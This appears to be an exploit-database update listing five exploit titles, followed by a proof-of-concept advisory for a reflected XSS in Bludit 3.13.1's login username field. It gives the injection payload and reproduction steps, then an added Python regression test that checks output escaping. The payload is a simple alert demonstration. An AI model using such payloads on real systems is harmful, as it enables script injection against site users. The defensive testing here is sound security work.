
5 changes to exploits/shellcodes

Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)
Quick.CMS 6.7 - Cross Site Request Forgery (CSRF) to Cross Site Scripting (XSS) (Authenticated)
SuiteCRM 7.11.18 - Remote Code Execution (RCE) (Authenticated) (Metasploit)
GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)
Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload
# Exploit Title: Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)
# Date: 19/10/2021
# Exploit Author: Vasu (tamilan_mkv)
# Vendor Homepage: https://www.bludit.com
# Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip
# Version: bludit-3-13-1
# Tested on: Kali Linux
# CVE : CVE-2021-35323

### Steps to reproduce

1. Open the login page http://localhost:800/admin/login
2. In the username field, enter ``admin"><img src=x onerror=alert(1)>`` and enter the password
3. Trigger the malicious JavaScript code
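
A regression check for the reflection in step 2, as an added example that is not part of the original advisory or Bludit's own code: it renders the submitted username into a form field with and without output encoding, then parses the result to confirm the value stayed inside the `value` attribute. The form markup and all function names are assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser

# Payload taken from step 2 of the advisory.
PAYLOAD = 'admin"><img src=x onerror=alert(1)>'

# Constructed login-form fragment; the field markup is an assumption,
# not Bludit's actual template.
FORM = '<form method="post"><input type="text" name="username" value="{}"></form>'


def render_unescaped(username):
    """Reflects the submitted username verbatim (the flawed pattern)."""
    return FORM.format(username)


def render_escaped(username):
    """Encodes &, <, > and both quote characters before reflection."""
    return FORM.format(escape(username, quote=True))


class _Audit(HTMLParser):
    """Collects every start tag and the parsed value of the username field."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.username_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        attrs = dict(attrs)
        if tag == "input" and attrs.get("name") == "username":
            self.username_value = attrs.get("value")


def reflection_is_safe(page, submitted):
    """True when the input stays inside the value attribute and adds no tags."""
    audit = _Audit()
    audit.feed(page)
    audit.close()
    return audit.tags == ["form", "input"] and audit.username_value == submitted


if __name__ == "__main__":
    print("unescaped:", reflection_is_safe(render_unescaped(PAYLOAD), PAYLOAD))
    print("escaped:  ", reflection_is_safe(render_escaped(PAYLOAD), PAYLOAD))
```

The same assertion can be pointed at the real login response after upgrading, by feeding the returned HTML to `reflection_is_safe` with the tag list adjusted to the actual page.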